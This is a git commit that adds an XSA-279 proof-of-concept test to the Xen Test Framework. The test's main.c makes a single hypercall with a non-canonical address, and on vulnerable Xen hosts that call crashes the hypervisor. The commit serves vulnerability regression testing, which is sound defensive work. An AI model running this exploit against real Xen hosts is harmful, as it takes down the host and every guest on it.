From: Andrew Cooper <andrew.cooper3@citrix.com>
Date: Wed, 10 Oct 2018 10:42:00 +0000 (+0000)
Subject: XSA-279 PoC
X-Git-Url: http://xenbits.xensource.com/gitweb?a=commitdiff_plain;h=55b53286e669cc27119f5b4323a7e4db2aeae91f;p=xtf.git

XSA-279 PoC

Signed-off-by: Andrew Cooper <andrew.cooper3@citrix.com>
---

diff --git a/docs/all-tests.dox b/docs/all-tests.dox
index 94527c2..1344671 100644
--- a/docs/all-tests.dox
+++ b/docs/all-tests.dox
@@ -131,6 +131,9 @@ removals.
 
 @subpage test-xsa-278 - x86: Nested VT-x usable even when disabled.
 
+@subpage test-xsa-279 - x86: DoS from attempting to use INVPCID with a
+non-canonical addresses.
+
 
 @section index-utility Utilities
 
diff --git a/tests/xsa-279/Makefile b/tests/xsa-279/Makefile
new file mode 100644
index 0000000..af25aab
--- /dev/null
+++ b/tests/xsa-279/Makefile
@@ -0,0 +1,9 @@
+include $(ROOT)/build/common.mk
+
+NAME      := xsa-279
+CATEGORY  := xsa
+TEST-ENVS := pv64
+
+obj-perenv += main.o
+
+include $(ROOT)/build/gen.mk
diff --git a/tests/xsa-279/main.c b/tests/xsa-279/main.c
new file mode 100644
index 0000000..c0fa604
--- /dev/null
+++ b/tests/xsa-279/main.c
@@ -0,0 +1,44 @@
+/**
+ * @file tests/xsa-279/main.c
+ * @ref test-xsa-279
+ *
+ * @page test-xsa-279 XSA-279
+ *
+ * Advisory: [XSA-279](http://xenbits.xen.org/xsa/advisory-279.html)
+ *
+ * When `PCID` support was added to Xen to mitigate some of the performance
+ * hit from the Meltdown protection, Xen's internal TLB flushing changed from
+ * using `INVLPG` to using `INVPCID`.  These instructions differ in how they
+ * handle non-canonical addresses, with the latter raising a @#GP[0] fault.
+ *
+ * One path passed an un-audited guest value into Xen's internal TLB flushing
+ * logic, which used to be safe, but no longer is.
+ *
+ * Deliberately try to invalidate a non-canonical address.  If Xen is using
+ * the INVPCID instruction for TLB management (at the time of writing, Haswell
+ * and later hardware, PCID or INVPCID not explicitly disabled on the command
+ * line, and XPTI activated for the domain), and is vulnerable, it will die
+ * with an unhandled @#GP[0] fault.
+ *
+ * @see tests/xsa-279/main.c
+ */
+#include <xtf.h>
+
+const char test_title[] = "XSA-279 PoC";
+
+void test_main(void)
+{
+    hypercall_update_va_mapping(1ul << 63, 0, UVMF_INVLPG | UVMF_ALL);
+
+    xtf_success("Success: Not vulnerable to XSA-279\n");
+}
+
+/*
+ * Local variables:
+ * mode: C
+ * c-file-style: "BSD"
+ * c-basic-offset: 4
+ * tab-width: 4
+ * indent-tabs-mode: nil
+ * End:
+ */